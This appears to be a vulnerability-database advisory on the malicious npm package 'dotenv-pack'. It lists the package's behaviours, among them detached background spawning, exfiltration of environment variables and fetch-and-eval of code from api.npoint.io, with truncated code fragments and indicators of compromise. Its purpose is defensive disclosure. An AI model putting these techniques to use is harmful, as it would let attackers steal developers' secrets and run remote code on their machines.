VDB
GCVE-110-OSM-2026-2725
GCVE-110-OSM-2026-2725
Advisory PublishedCVSS 9.6/10
Malicious package detected. Behaviors: data exfiltration, code execution, network activity, obfuscated code. Package attributed to DPRK threat actors via kmsec.uk research.
Payload: lib/initializeCaller.js
Key findings:
- Stealth Background Process Spawning in index.js: "spawn('node', [scriptPath, JSON.stringify(args)], {
detached: true,
stdi..."
- Environment Variable Exfiltration in lib/initializeCaller.js: "process.env.DEV_SECRET_VALUE);
let retryCount = 5;
while (retryCount > 0) ..."
- Global Variable Shadowing in lib/initializeCaller.js: "const process = {"
- Base64 Decoded Environment Variable in lib/initializeCaller.js: "atob(process.env."
- Fetch and Eval/Exec in lib/initializeCaller.js: "axios.get(apiEndpoint, { headers: { [apiHeaderKey]: apiHeaderValue } })).data.co..."
IOCs:
- urls: http://192.168.1.42:9200, https://api.npoint.io/5b357f718ab4ee355003
- domains: api.npoint.io
- payloadFileHash: e4c017332805164513256ba7aa62b7f6d7f7b44777f0e6f76b7c6e73ab13d8b8
Decoded/deobfuscated IOCs:
- urls: https://api.npoint.io/5b357f718ab4ee355003
- domains: api.npoint.io
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | dotenv-pack | all (affected) | — |
Browse GCVE Records
72,148 records in the GCVE database · Updated July 14, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.